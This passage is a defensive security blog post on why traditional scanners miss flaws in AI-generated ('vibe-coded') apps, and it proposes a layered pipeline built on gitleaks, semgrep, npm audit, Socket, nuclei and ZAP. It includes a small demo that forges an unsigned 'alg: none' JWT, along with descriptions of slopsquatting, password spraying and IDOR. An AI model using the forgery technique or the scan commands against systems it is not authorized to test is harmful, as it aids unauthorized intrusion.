Scanning Vibe-Coded Apps: Why Traditional SAST/DAST Falls Short (part 6)

Vibe Coding Security Series

  1. What Is Vibe Coding Security? A Field Guide for 2026
  2. The OWASP Top 10 for Vibe-Coded Applications
  3. Anatomy of a Vibe Coding Breach: Lessons from 2026’s Worst Incidents
  4. The Dependency Trap: Supply Chain Risks in AI-Generated Code
  5. Authentication & Secrets: What AI Gets Wrong Every Time
  6. Scanning Vibe-Coded Apps: Why Traditional SAST/DAST Falls Short (you are here)
  7. Prompt Engineering for Secure Code
  8. The Founder’s Security Checklist (coming soon)
  9. Securing the AI Coding Pipeline (coming soon)
  10. The Future of Vibe Coding Security (coming soon)

Read Time: 20 minutes

TL;DR

Traditional security scanners pattern-match on code that exists. The most dangerous vulnerabilities in vibe-coded apps live in code that doesn’t exist — missing auth checks, missing rate limiting, missing authorization logic. A January 2026 SAST benchmark found tools flagging 68–75% of safe code as vulnerable while architectural flaws passed silently, and Georgia Tech has tracked 74 AI-attributed CVEs with monthly discoveries growing 6x in two months. New AI-native tools are closing the gap, but as of mid-2026, broken authorization and absent security controls still require human review. This post covers what works, what doesn’t, and how to build a scanning pipeline for AI-generated code.


The Scanning Paradox

We have more security scanning tools than at any point in the history of software development. SAST, DAST, SCA, IAST, RASP — the acronym count alone suggests the problem should be solved. And for human-written code, these tools have been steadily improving for two decades. The issue is that vibe-coded applications don’t fail the way human-written ones do.

When a human developer introduces a SQL injection, it’s usually because they forgot to parameterize a query. A SAST tool pattern-matches on string concatenation inside a SQL call and flags it. Straightforward. When an AI coding tool introduces a security flaw, the code is typically syntactically clean, follows documented API patterns, and passes every functional test. The vulnerability isn’t in how the code is written — it’s in what the code doesn’t do. Missing server-side validation. Missing rate limiting. Missing authorization checks. Missing RLS policies. You can’t pattern-match on absent code.

Georgia Tech’s Vibe Security Radar, launched in May 2025, tracks CVEs attributable to AI coding tools by tracing fixing commits backward through Git history. Their numbers tell the story: 6 AI-attributed CVEs in January 2026, 15 in February, 35 in March. A nearly 6x increase in two months. The total confirmed count stands at 74, with researchers estimating the true number is 5–10x higher because most AI-generated code doesn’t leave clear attribution markers.

Meanwhile, the Cloud Security Alliance’s emergency strategy briefing — assembled over a single weekend by 60+ contributors including Jen Easterly and Bruce Schneier — warned that the window to fix vulnerabilities is collapsing: mean time from disclosure to confirmed exploitation has fallen to less than one day in 2026, down from 2.3 years in 2019. Separate CSA research has found that 62% of AI-generated code samples contained vulnerabilities.

The scanners are running, the vulnerabilities are still shipping, and the gap is widening.


What SAST Actually Catches (And What It Doesn’t)

Static Application Security Testing works by analyzing source code without executing it. Tools like CodeQL, Semgrep, SonarQube, and Checkmarx parse the code into an abstract syntax tree, then match patterns against known vulnerability signatures — string concatenation in SQL queries, eval() on untrusted input, deprecated cryptographic functions. These are well-defined patterns, and SAST handles them reliably.

The problem is false positives and structural blind spots.

The False Positive Problem

A January 2026 study benchmarked CodeQL, Semgrep, SonarQube, and Joern against OWASP Benchmark v1.2 — 2,740 Java test cases with known vulnerability status. CodeQL achieved the highest F1-score at 74.4%, but it flagged 68.2% of non-vulnerable test cases as positive — 904 false positives across the benchmark. SonarQube produced 1,254 false positives, covering 45.8% of all test cases. Semgrep flagged 74.8% of non-vulnerable cases. Joern had the fewest false positives at 96 but achieved only 8.2% recall — it catches almost nothing.
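The percentages above use two different denominators, which is easy to miss. Here is a minimal sketch of the arithmetic. It assumes the benchmark's 2,740 cases split into 1,325 non-vulnerable and 1,415 vulnerable ones, a split that is not stated above but reproduces the 68.2% figure. The true-positive count in the last line is purely hypothetical.

```python
TOTAL_CASES = 2740
SAFE_CASES = 1325  # assumption: non-vulnerable cases in OWASP Benchmark v1.2


def false_positive_rate(false_positives: int, safe_cases: int) -> float:
    """Share of safe test cases that the tool flagged anyway."""
    return false_positives / safe_cases


def noise_share(false_positives: int, true_positives: int) -> float:
    """Share of all alerts that are false (1 - precision)."""
    return false_positives / (false_positives + true_positives)


codeql_fpr = false_positive_rate(904, SAFE_CASES)
sonarqube_share_of_all = 1254 / TOTAL_CASES

print(f"CodeQL false positive rate: {codeql_fpr:.1%}")
print(f"SonarQube false positives vs all cases: {sonarqube_share_of_all:.1%}")

# Hypothetical: a tool with 904 false positives that also found 1,200 real issues
hypothetical_noise = noise_share(904, 1200)
print(f"Alert noise in that hypothetical case: {hypothetical_noise:.1%}")
```

The false positive rate describes how a tool treats safe code. How much of the alert list is noise also depends on how many real issues the tool finds.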

For a vibe coder running Semgrep on their AI-generated codebase for the first time, a tool that flagged roughly three-quarters of the benchmark’s safe test cases is going to produce a lot of noise. After the third false positive about a “potential injection” in code that’s actually safe, most people stop reading the output entirely. The signal drowns in the noise, and the real issues, the ones that matter, scroll past unread.

Here’s one I run into constantly. Over the past few years I’ve done plenty of code reviews for AWS-based applications at VULNEX, and Semgrep flags AWS account IDs as sensitive information leaks in nearly every project. The problem is that AWS themselves don’t consider account IDs to be sensitive — their documentation explicitly states they can be shared when needed. That’s a false positive that shows up in every single AWS project, training teams to ignore Semgrep output for that codebase entirely. I always work with the customer to understand their specific privacy requirements before dismissing or escalating any finding — some organizations do treat account IDs as internal-only regardless of what AWS says — but this is exactly the kind of noise that erodes trust in automated tools.

The Structural Blind Spot

False positives are annoying but manageable. The structural blind spot is the real problem. SAST works by matching patterns in code that exists. Vibe-coded vulnerabilities are often in code that doesn’t exist.

Consider the QuickNote app from Part 5. The most dangerous issues weren’t bugs in the code — they were missing features. No rate limiting on the login endpoint. No RLS policies on the database. No server-side authorization check. No token expiration. SAST cannot flag the absence of a security control, because there’s no code to analyze. It’s like asking a spell-checker to tell you that your essay is missing a conclusion.

Here’s what happens when you run Semgrep against a typical vibe-coded Express.js app:

semgrep --config=auto ./src

Semgrep will likely flag things like innerHTML usage (real issue — XSS), eval() calls if present, and maybe the MD5 hash function. What it won’t flag: the /api/users/:id/notes endpoint lacking an ownership check, jwt.sign() called without an expiresIn parameter, the entire application having no rate limiting middleware, Supabase RLS disabled on every table.

These are the vulnerability classes that matter most in vibe-coded applications, and SAST is structurally incapable of detecting them.
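One way to surface absent controls is to stop looking for bad patterns and instead audit an inventory of routes against a list of required controls. A minimal sketch, assuming you can export such an inventory by hand or from your router. The `Route` structure, the middleware names `requireAuth`, `requireOwner`, and `rateLimit`, the policy rules, and the sample routes are all hypothetical.

```python
from dataclasses import dataclass, field


@dataclass
class Route:
    method: str
    path: str
    middleware: list[str] = field(default_factory=list)


def required_controls(route: Route) -> set[str]:
    """Hypothetical policy: which controls each kind of route must carry."""
    required = set()
    if route.path.startswith("/api/") and route.path != "/api/login":
        required.add("requireAuth")
    if ":id" in route.path:
        required.add("requireOwner")
    if route.path == "/api/login":
        required.add("rateLimit")
    return required


def missing_controls(routes: list[Route]) -> dict[str, set[str]]:
    """Map 'METHOD path' to the controls that are required but absent."""
    gaps = {}
    for route in routes:
        missing = required_controls(route) - set(route.middleware)
        if missing:
            gaps[f"{route.method} {route.path}"] = missing
    return gaps


routes = [
    Route("POST", "/api/login"),
    Route("GET", "/api/users/:id/notes", ["requireAuth"]),
    Route("GET", "/api/health", ["requireAuth"]),
]

gaps = missing_controls(routes)
for name, missing in gaps.items():
    print(name, "is missing", sorted(missing))
```

The point of the design is that the policy, not the code, defines what should exist, so a route with nothing wrong in it can still fail the audit.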

What SAST Is Good For

This isn’t an argument to stop using SAST. Pattern-matching catches real issues: hardcoded credentials (when they match known patterns), dangerous function calls, known-vulnerable library usage, obvious injection vectors. For the subset of vulnerabilities that look like traditional bugs, SAST works. The problem is that in vibe-coded apps, that subset covers maybe 30% of the actual risk surface. The other 70% is architectural.


What DAST Misses in the SPA Era

Dynamic Application Security Testing takes the opposite approach — instead of reading source code, it runs the application and attacks it from outside. OWASP ZAP and Burp Suite send malicious payloads to endpoints, monitor responses, and flag behavior that indicates vulnerabilities. If you can trigger a SQL injection through an HTTP request, DAST finds it. If a reflected XSS payload shows up in the response, DAST catches it.

For traditional server-rendered web applications, DAST has been reasonably effective. But vibe-coded applications are overwhelmingly single-page apps (SPAs) built with React, Next.js, or Vue, and DAST’s architecture has a hard time with them.

The Crawling Problem

DAST discovers application functionality by crawling — following links, submitting forms, parsing HTML. SPAs don’t work that way. Routes are handled client-side by JavaScript. Forms are React components that communicate via fetch() calls. API endpoints aren’t discoverable by parsing HTML, because the HTML is a nearly empty shell that loads a JavaScript bundle. A DAST crawler hitting a typical vibe-coded React app sees <div id="root"></div> and maybe a few <script> tags. It misses everything.

Modern DAST tools have gotten better at JavaScript rendering — ZAP has an AJAX Spider, Burp has a built-in browser. But they still struggle with authentication flows (especially OAuth), multi-step workflows, and application state. A login form that uses useState for input tracking and useEffect for token storage doesn’t behave like a traditional HTML form, and DAST crawlers frequently can’t complete the auth flow to reach the protected surface area behind it.

The Business Logic Gap

Even when DAST can reach the endpoints, it hits the same wall SAST does: the vulnerability is in what the code doesn’t do. DAST sends a SQL injection payload to /api/notes and checks whether the response looks like database output. That’s a legitimate test. But it doesn’t test whether /api/notes/42 returns data belonging to a different user. It doesn’t test whether the /api/admin/users endpoint is accessible with a non-admin token. It doesn’t test whether the login endpoint allows 10,000 attempts per minute.

These are business logic vulnerabilities — they require understanding the application’s intended behavior, not just its input/output surface. DAST treats the application as a black box. For vibe-coded apps where the most dangerous vulnerabilities are in the authorization model, that black-box approach misses the things that matter.

Where DAST Still Helps

DAST catches configuration issues that SAST can’t: missing security headers, permissive CORS policies, exposed server information, SSL/TLS misconfigurations. These are deployment-level problems, not code-level problems, and vibe-coded apps tend to ship with terrible default configurations because the AI optimizes for “it works locally.” Running ZAP or Nuclei against your deployed application catches the infrastructure-layer gaps.
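The header and CORS portion of such a check is simple enough to sketch. The example below takes a response's headers as a plain dictionary, so it makes no network calls. The list of expected headers is an assumption you would adjust to your own policy.

```python
EXPECTED_HEADERS = [
    "content-security-policy",
    "strict-transport-security",
    "x-content-type-options",
    "x-frame-options",
]


def audit_headers(headers: dict[str, str]) -> list[str]:
    """Return human-readable findings for a set of response headers."""
    present = {name.lower(): value for name, value in headers.items()}
    findings = [
        f"missing header: {name}" for name in EXPECTED_HEADERS if name not in present
    ]
    # A wildcard origin lets any site read non-credentialed responses.
    if present.get("access-control-allow-origin") == "*":
        findings.append("permissive CORS: Access-Control-Allow-Origin is *")
    # Framework banners tell an attacker what stack they are facing.
    if "x-powered-by" in present:
        findings.append(f"server information exposed: X-Powered-By={present['x-powered-by']}")
    return findings


sample = {
    "Content-Type": "text/html",
    "X-Powered-By": "Express",
    "Access-Control-Allow-Origin": "*",
    "X-Content-Type-Options": "nosniff",
}
header_findings = audit_headers(sample)
for finding in header_findings:
    print(finding)
```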

Nuclei deserves a specific mention. Its community-maintained template library now exceeds 11,000 templates, and ProjectDiscovery has introduced AI-powered template generation — describe a check in natural language, get a YAML template. A recent pull request added AI Security DAST templates specifically targeting AI-system patterns. It’s not solving the fundamental architectural problem, but it’s the closest DAST has gotten to being vibe-code-aware.


The SCA Gap: When Dependencies Don’t Exist

Software Composition Analysis (SCA) tools — Snyk, npm audit, Dependabot, Socket.dev — check your project’s dependencies against vulnerability databases. If you’re using lodash@4.17.20 and there’s a CVE for that version, SCA flags it. This has been one of the most effective automated security practices for the past decade.

AI-generated code breaks SCA because the dependencies are made up.

Slopsquatting

The term, coined by security researcher Seth Larson, describes what happens when AI coding tools recommend packages that don’t exist in any registry. A March 2025 study analyzing 576,000 AI-generated code samples found that roughly 20% recommended packages that aren’t real. Worse, 43% of those hallucinated package names are consistent across different AI runs — meaning an attacker can predict which fake names the AI will suggest, register them, and fill them with malicious code.

That’s exactly what happened. In January 2026, a hallucinated npm package called react-codeshift spread through 237 repositories via AI-generated code. Nobody deliberately planted the package name in the AI’s training data. The AI hallucinated it, multiple developers installed it when their AI suggested it, and eventually someone registered it with malicious code. The supply chain attack was automated by the AI itself.

SCA tools can’t flag a malicious package that has no CVE, and a brand-new package doesn’t appear in any vulnerability database yet. npm audit would report zero issues for react-codeshift: the package existed, it had no known CVEs, and its package.json looked normal. The malicious behavior was in the code, not in the metadata.

What Different SCA Tools Catch

The SCA landscape has split into two camps. Traditional CVE-based tools (npm audit, Dependabot, basic Snyk scanning) check packages against known vulnerability databases. If the vulnerability has a CVE, they catch it. If it doesn’t, they don’t. For established packages with active security research, this works. For hallucinated packages, newly registered packages, and packages with obfuscated malicious behavior, it’s blind.

Socket.dev represents the newer approach — it analyzes package behavior rather than just checking CVE databases. It detects install scripts that exfiltrate environment variables, network calls to unexpected domains, obfuscated code that decodes at runtime, and sudden changes in maintainer behavior. This behavioral analysis catches supply chain attacks that CVE databases haven’t catalogued yet.

Snyk’s DeepCode AI combines symbolic analysis with AI to scan code snippets as they’re generated, catching vulnerable patterns inside the IDE before they reach the repository. This is closer to where SCA needs to go for vibe-coded apps — flagging issues at generation time rather than after the package is installed and the code is committed.

For the dependency problems I covered in Part 4, no single SCA tool covers the full risk surface. The practical answer is layering: npm audit for known CVEs, Socket.dev for behavioral anomalies, and manual verification that the packages your AI suggested actually exist and are what they claim to be.
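The manual verification step can be partly scripted. A minimal sketch, assuming you have already fetched basic registry metadata for each dependency. The `registry_info` dictionary below is hypothetical stand-in data (including the dates and download counts), the package name `auth-helper-utils` is invented, and the 30-day and 1,000-download thresholds are arbitrary.

```python
from datetime import date


def vet_dependencies(dependencies, registry_info, today,
                     min_age_days=30, min_weekly_downloads=1000):
    """Flag dependencies that are missing from the registry, very new, or rarely used."""
    warnings = []
    for name in dependencies:
        info = registry_info.get(name)
        if info is None:
            warnings.append(f"{name}: not found in registry (possible hallucination)")
            continue
        age_days = (today - info["first_published"]).days
        if age_days < min_age_days:
            warnings.append(f"{name}: first published {age_days} days ago")
        if info["weekly_downloads"] < min_weekly_downloads:
            warnings.append(f"{name}: only {info['weekly_downloads']} weekly downloads")
    return warnings


# Hypothetical metadata, standing in for what a registry lookup would return.
registry_info = {
    "express": {"first_published": date(2011, 1, 1), "weekly_downloads": 30_000_000},
    "react-codeshift": {"first_published": date(2026, 1, 10), "weekly_downloads": 240},
}
dependencies = ["express", "react-codeshift", "auth-helper-utils"]

dependency_warnings = vet_dependencies(dependencies, registry_info, today=date(2026, 1, 20))
for warning in dependency_warnings:
    print(warning)
```

A young or rarely downloaded package is not proof of malice. These warnings only tell you which names deserve a human look before installation.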


What’s Actually Working: The New Wave

The gap between what traditional tools catch and what vibe-coded apps need has spawned a new generation of security tools. Some are AI-native — they use LLMs to reason about code instead of pattern-matching. Others take hybrid approaches, combining traditional analysis with AI-powered reasoning. A few are specifically designed for vibe-coded applications.

LLM-Augmented SAST

The most promising near-term improvement is using LLMs to post-process traditional SAST output. The same January 2026 study that exposed SAST’s false positive rates also tested layering LLM agents on top of the output. The best configuration reduced the initial false positive rate from 98.3% to 6.3%. The LLM reads the flagged code in context, understands what it’s doing, and determines whether the flag is legitimate or noise.

This doesn’t solve the blind spot problem — the LLM is still working from SAST’s initial findings, so absent code remains invisible. But it makes SAST output actually usable. Instead of 750 alerts where 700 are false positives, you get 50 alerts where 47 are real. That’s the difference between a report nobody reads and a report that drives fixes.
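The arithmetic behind that illustration, as a quick sketch. It uses only the illustrative alert counts from the paragraph above, which are not measurements from the study, and it assumes the 47 real findings in the filtered list come from the 50 real ones in the raw output.

```python
def precision(real_findings: int, total_alerts: int) -> float:
    """Share of alerts that point at a real issue."""
    return real_findings / total_alerts


raw_alerts, raw_false = 750, 700
filtered_alerts, filtered_real = 50, 47

raw_real = raw_alerts - raw_false  # real findings buried in the raw output
before = precision(raw_real, raw_alerts)
after = precision(filtered_real, filtered_alerts)
dropped_real = raw_real - filtered_real  # real findings the filter discarded

print(f"precision before filtering: {before:.1%}")
print(f"precision after filtering:  {after:.1%}")
print(f"real findings lost to the filter: {dropped_real}")
```

Under that reading the filter is not free: a few real findings are discarded along with the noise, which is worth tracking when tuning such a filter.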

Neuro-Symbolic Analysis (IRIS)

IRIS, published at ICLR 2025, takes a different approach. Instead of post-filtering SAST output, it combines LLM reasoning with CodeQL’s static analysis in a neuro-symbolic framework. The LLM identifies potential vulnerability patterns through code comprehension, then CodeQL validates them with formal analysis. Using GPT-4, IRIS detected 55 vulnerabilities across 30 Java projects — 103.7% more than CodeQL alone. It found 4 previously unknown vulnerabilities. Even a smaller model (DeepSeekCoder 7B) detected 52 vulnerabilities, showing this approach doesn’t require cutting-edge models.

The false discovery rate is still high at 84.82%, but that is 5.21 percentage points lower than CodeQL by itself. More importantly, IRIS catches vulnerability categories that pure pattern-matching misses: it can reason about whether an authorization check is semantically correct, not just whether one exists.

AI-Native Scanners

Two major AI-native security scanners launched in early 2026. Anthropic’s Claude Code Security, released February 2026, uses LLM reasoning to analyze code for vulnerabilities rather than matching patterns. It’s available to Enterprise and Team customers, and free for open-source maintainers. In its initial period, it found over 500 high-severity vulnerabilities in open-source projects. OpenAI’s Codex Security, launched March 2026, scanned over 1.2 million commits during beta, surfacing 792 critical and 10,561 high-severity findings.

Neither tool has been independently audited, so take the numbers with appropriate caution. But the approach is fundamentally different from traditional SAST — instead of matching patterns, these tools read code the way a security reviewer would, reasoning about data flow, trust boundaries, and whether the security model makes architectural sense.

Pre-Publish Security Gates

VibeGuard, published April 2026, targets the specific blind spots of AI-generated code with a pre-publish security gate framework. It checks for five categories: artifact hygiene (source maps, debug files shipping to production), packaging-configuration drift, hardcoded secrets, supply-chain risks, and source-map exposure. The motivation came from a real incident — in March 2026, Anthropic’s own Claude Code CLI shipped a 59.8 MB source map exposing roughly 512,000 lines of TypeScript source. In controlled experiments on 8 synthetic projects, VibeGuard achieved 100% recall and 89.47% precision (F1 = 94.44%).
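For readers who want to check the reported F1 score: it is the harmonic mean of precision and recall. The sketch below also shows one set of counts (17 true findings, 2 false alarms, 0 misses) that reproduces the published percentages. Those counts are an inference for illustration, not figures taken from the paper.

```python
def f1_score(precision: float, recall: float) -> float:
    """Harmonic mean of precision and recall."""
    return 2 * precision * recall / (precision + recall)


def metrics_from_counts(tp: int, fp: int, fn: int) -> tuple[float, float, float]:
    """Precision, recall, and F1 from raw confusion-matrix counts."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    return precision, recall, f1_score(precision, recall)


reported_f1 = f1_score(precision=0.8947, recall=1.0)
print(f"F1 from reported precision and recall: {reported_f1:.2%}")

# Illustrative counts only: one combination consistent with the reported figures.
p, r, f1 = metrics_from_counts(tp=17, fp=2, fn=0)
print(f"precision={p:.2%} recall={r:.2%} F1={f1:.2%}")
```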

This is a narrower tool than a full SAST scanner, but it targets exactly the things vibe-coded apps get wrong. AI coding tools are very good at generating code that works. They’re terrible at generating deployment artifacts that are clean and hardened. VibeGuard sits in the gap.

Agentic Security Platforms

DryRun Security calls itself “AI-native, agentic” code security. Rather than pattern-matching individual files, it inspects data flow across files and services — understanding how data moves through the application at an architectural level. Their 2025 SAST Accuracy Report showed 88% detection of seeded vulnerabilities out of the box, outperforming four leading traditional static analyzers, with particular strength on complex logic and authorization flaws. In February 2026, they launched a DeepScan Agent that does full-repository security reviews.

Escape raised $18 million in March 2026 specifically to replace legacy scanners with AI agent-driven security testing. Their research team’s methodology is worth studying: they scanned 5,600 publicly accessible vibe-coded applications and found over 2,000 high-impact vulnerabilities. The breakdown is telling — 400+ exposed secrets and 175 instances of personal data exposure, including medical records and bank account numbers. Zero-auth APIs, missing rate limiting, and BOLA/IDOR dominated the findings. These are exactly the vulnerability classes that traditional scanners miss.


What Scanners Miss: The Vibe Code Blind Spots

Across the research, six vulnerability patterns in AI-generated code consistently evade traditional scanning tools. Knowing them means you know what to look for manually, even when the scanner gives you a clean report.

1. Frontend-Only Security Controls

The AI generates a React auth guard that checks localStorage for a JWT before rendering protected routes. The guard works — unauthenticated users see the login page. But the API behind those routes accepts any request, with or without a token. SAST scanning the backend sees API endpoints that take requests and return data. It doesn’t cross-reference with the frontend to check whether server-side enforcement exists. DAST might not reach the endpoints at all if it can’t complete the frontend auth flow.

2. Zero-Auth APIs

Escape’s scan of 5,600 vibe-coded apps found applications with 7–12 public API endpoints performing destructive operations (DELETE, PUT) with no authentication at all. The OpenAPI spec — when one existed — had no security schemes defined. SAST doesn’t flag an endpoint for not having auth middleware, because “no middleware” isn’t a pattern it can match. The code is perfectly valid; it’s just missing a security requirement.

3. Missing Rate Limiting

As I showed in Part 5, a login endpoint without rate limiting lets an attacker try the top 1,000 passwords in ten seconds. No scanner flags this because rate limiting is a middleware addition, not a code pattern. The login endpoint itself is correct — it validates credentials and returns a token. The absence of express-rate-limit or its equivalent is a deployment decision, not a code bug.
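What the missing control amounts to can be sketched in a few lines. This is a fixed-window counter kept in memory, a deliberately simplified stand-in for middleware such as express-rate-limit. The class name, the limit of 5 attempts per 60 seconds, and the use of 200 to mean "proceed" are illustrative assumptions.

```python
from collections import defaultdict


class LoginRateLimiter:
    """Fixed-window limiter: at most `limit` attempts per client per window."""

    def __init__(self, limit: int = 5, window_seconds: int = 60):
        self.limit = limit
        self.window_seconds = window_seconds
        self._counts = defaultdict(int)  # (client, window index) -> attempts

    def check(self, client_ip: str, now: float) -> int:
        """Return the HTTP status the login route should answer with."""
        window = int(now // self.window_seconds)
        self._counts[(client_ip, window)] += 1
        if self._counts[(client_ip, window)] > self.limit:
            return 429  # Too Many Requests
        return 200  # proceed to credential validation


limiter = LoginRateLimiter()
# Simulate 100 rapid attempts from one address within the same second.
statuses = [limiter.check("203.0.113.7", now=1000.0) for _ in range(100)]
print(statuses.count(200), "allowed,", statuses.count(429), "rejected")
```

A production limiter would also expire old windows and usually keep its counters in shared storage so that multiple server instances agree.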

4. BOLA/IDOR Without Sequential IDs

The Lovable BOLA breach from Part 5 is the canonical example. The API checked authentication (valid Firebase token) but not authorization (does this token’s user own this project?). SAST sees the firebase.auth() call and considers the endpoint protected. The ownership check that should follow is business logic the scanner can’t infer. DAST could theoretically detect IDOR by testing two different user sessions, but most DAST configurations don’t set up multi-user testing scenarios.
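The difference between authentication and authorization is easiest to see side by side. A toy in-memory sketch follows. The data, tokens, function names, and status codes are hypothetical, and nothing here reproduces real Firebase or Lovable code.

```python
PROJECTS = {
    "p1": {"owner": "alice", "name": "Alice's app"},
    "p2": {"owner": "bob", "name": "Bob's app"},
}
VALID_TOKENS = {"token-alice": "alice", "token-bob": "bob"}


def get_project_authn_only(token: str, project_id: str):
    """Vulnerable: verifies who the caller is, never whether they own the project."""
    user = VALID_TOKENS.get(token)
    if user is None:
        return 401, None
    return 200, PROJECTS.get(project_id)


def get_project_with_ownership(token: str, project_id: str):
    """Fixed: authentication followed by an ownership (authorization) check."""
    user = VALID_TOKENS.get(token)
    if user is None:
        return 401, None
    project = PROJECTS.get(project_id)
    if project is None or project["owner"] != user:
        return 404, None  # same answer for "missing" and "not yours"
    return 200, project


# The two-session test most DAST setups skip: Bob asks for Alice's project.
print(get_project_authn_only("token-bob", "p1")[0])
print(get_project_with_ownership("token-bob", "p1")[0])
```

Both functions contain an authentication step, which is why a scanner that only looks for the presence of an auth call cannot tell them apart.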

5. Insecure Default Configurations

AI-generated code uses Supabase with RLS disabled, Firebase with security rules set to allow read, write: if true, Express with the cors middleware left at its allow-all default, and JWT libraries with the algorithms parameter unset (which in some libraries and versions opens the door to the alg: none attack). None of these are bugs. They’re all valid configurations that happen to be insecure. SAST would need configuration-specific rules to flag them, and most tools don’t ship with rules for “Supabase table missing RLS policy.”
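For the JWT item, the fix is to pin the accepted algorithms. The sketch below hand-rolls a tiny HS256 token check with the standard library purely to show the mechanism. Real applications should rely on a maintained JWT library, and every name and key here is illustrative.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(payload: dict, alg: str, secret: bytes = b"") -> str:
    """Build a token; alg 'none' produces an unsigned token like an attacker would."""
    header = b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    signature = b""
    if alg == "HS256":
        signature = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(signature)}"


def verify(token: str, secret: bytes, allowed_algorithms: list[str]) -> dict:
    """Reject any token whose header names an algorithm outside the allowlist."""
    header_b64, body_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") not in allowed_algorithms:
        raise ValueError(f"algorithm {header.get('alg')!r} not allowed")
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


SECRET = b"demo-secret"  # hypothetical key for the example only
forged = make_token({"sub": "admin"}, alg="none")
genuine = make_token({"sub": "alice"}, alg="HS256", secret=SECRET)

print(verify(genuine, SECRET, allowed_algorithms=["HS256"]))
try:
    verify(forged, SECRET, allowed_algorithms=["HS256"])
except ValueError as error:
    print("rejected:", error)
```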

6. Artifact Hygiene Failures

Source maps shipped in production, .env files baked into Docker images, node_modules included in deployable artifacts, debug logging active in production. These aren’t code vulnerabilities — they’re packaging and deployment failures that expose source code, secrets, and internal architecture. Traditional SAST and DAST don’t scan build artifacts at all.
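A check for these failures can run against the build output itself. A minimal sketch, assuming a simple deny-list of file patterns and directory names (both lists are illustrative, not taken from any tool). It builds a throwaway directory so the example is self-contained.

```python
import tempfile
from pathlib import Path

# Assumption: things that should never appear in a deployable artifact.
FORBIDDEN_PATTERNS = ["*.map", ".env", ".env.*", "*.log"]
FORBIDDEN_DIRS = {"node_modules", ".git"}


def audit_artifact(build_dir: Path) -> list[str]:
    """Return relative paths inside build_dir that look like hygiene failures."""
    findings = set()
    for path in build_dir.rglob("*"):
        relative = path.relative_to(build_dir)
        if path.is_dir() and path.name in FORBIDDEN_DIRS:
            findings.add(str(relative))
        elif path.is_file() and any(path.match(p) for p in FORBIDDEN_PATTERNS):
            findings.add(str(relative))
    return sorted(findings)


# Demo: a fake build directory with one clean file and two that should not ship.
with tempfile.TemporaryDirectory() as tmp:
    build = Path(tmp)
    (build / "app.js").write_text("console.log('hi')")
    (build / "app.js.map").write_text("{}")
    (build / ".env").write_text("API_KEY=example")
    demo_findings = audit_artifact(build)

for finding in demo_findings:
    print("should not ship:", finding)
```

In a real pipeline you would point `audit_artifact` at your actual output directory or unpacked image layer and fail the build when the list is not empty.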


Building a Scanning Pipeline That Works

No single tool covers the full risk surface of a vibe-coded application. The practical answer is layering tools where each one covers a different gap, running them in the right order, and knowing what still requires human review.

Layer 1: Pre-Commit (Catch Secrets Before They Ship)

Before code reaches the repository, run secret detection. This is the highest-ROI automated check because secrets in version control are permanent — even if you delete the file, the secret lives in Git history.

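# Scan the repository, including Git history, with Gitleaks
gitleaks detect --source . --verbose

# In a pre-commit hook, scan only the staged changes (Gitleaks v8 syntax)
gitleaks protect --staged --verbose

# Or TruffleHog to scan files on disk (use "trufflehog git file://." to walk Git history instead)
trufflehog filesystem . --only-verified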

Configure this as a Git pre-commit hook. Every commit gets scanned. If a secret is detected, the commit is blocked. This is the one layer where automation is genuinely reliable — the patterns are well-defined and false positives are manageable.

Layer 2: CI Pipeline (SAST + SCA on Every Push)

Run SAST and SCA in your CI pipeline. The goal here isn’t perfection — it’s catching the 30% of issues that pattern-matching handles well.

# Semgrep with auto-config (pulls relevant rule sets for your stack)
semgrep --config=auto --error --json ./src > semgrep-results.json

# npm audit for known dependency CVEs
npm audit --audit-level=high

# Socket.dev CLI for behavioral dependency analysis
socket scan create --repo . --branch main

The critical step is filtering SAST output. If your team is drowning in false positives, start with only the high-confidence rules. Semgrep’s p/security-audit ruleset is more targeted than --config=auto. For SCA, differentiate between development and production dependencies — a CVE in a dev-only testing library is lower priority than one in your authentication middleware.
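Filtering can be as simple as post-processing the JSON report. A minimal sketch, assuming the report follows the shape of Semgrep's --json output (a top-level results list whose entries carry check_id, path, start.line, and extra.severity) and that ERROR is the severity you want to gate on. The sample report and rule IDs are hand-written for illustration, not real scan results.

```python
import json


def high_priority_findings(semgrep_json: str, severities=("ERROR",)) -> list[dict]:
    """Keep only findings whose rule severity is in `severities`."""
    report = json.loads(semgrep_json)
    kept = []
    for result in report.get("results", []):
        extra = result.get("extra", {})
        if extra.get("severity") in severities:
            kept.append({
                "rule": result.get("check_id"),
                "location": f"{result.get('path')}:{result.get('start', {}).get('line')}",
                "message": extra.get("message", ""),
            })
    return kept


# Hand-written sample in the assumed report shape (hypothetical rule IDs).
sample_report = json.dumps({
    "results": [
        {
            "check_id": "javascript.express.hypothetical-sql-injection",
            "path": "src/routes/notes.js",
            "start": {"line": 42},
            "extra": {"severity": "ERROR", "message": "User input reaches a SQL string"},
        },
        {
            "check_id": "generic.secrets.hypothetical-aws-account-id",
            "path": "infra/config.js",
            "start": {"line": 7},
            "extra": {"severity": "INFO", "message": "AWS account ID detected"},
        },
    ]
})

findings = high_priority_findings(sample_report)
for finding in findings:
    print(finding["location"], finding["rule"])
```

Severity labels vary between rule sets and Semgrep versions, so check what your own report contains before choosing the values to keep.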

Layer 3: Post-Deploy (DAST Against the Running App)

After deployment, run DAST against your actual application. This catches configuration issues that don’t exist in source code.

# Nuclei with community templates
nuclei -u https://yourapp.com -t nuclei-templates/ -severity critical,high

# ZAP baseline scan (mount the working directory so report.html is written to the host)
docker run -v "$(pwd):/zap/wrk/:rw" -t zaproxy/zap-stable zap-baseline.py -t https://yourapp.com -r report.html

For SPAs, use ZAP’s AJAX Spider (the -j option of zap-baseline.py) or Burp’s browser-based crawling rather than the default HTTP crawler. Feed the scanner your OpenAPI spec if you have one (ZAP’s zap-api-scan.py accepts one with -f openapi); it’ll discover endpoints the crawler misses.

Layer 4: AI-Augmented Review (The New Layer)

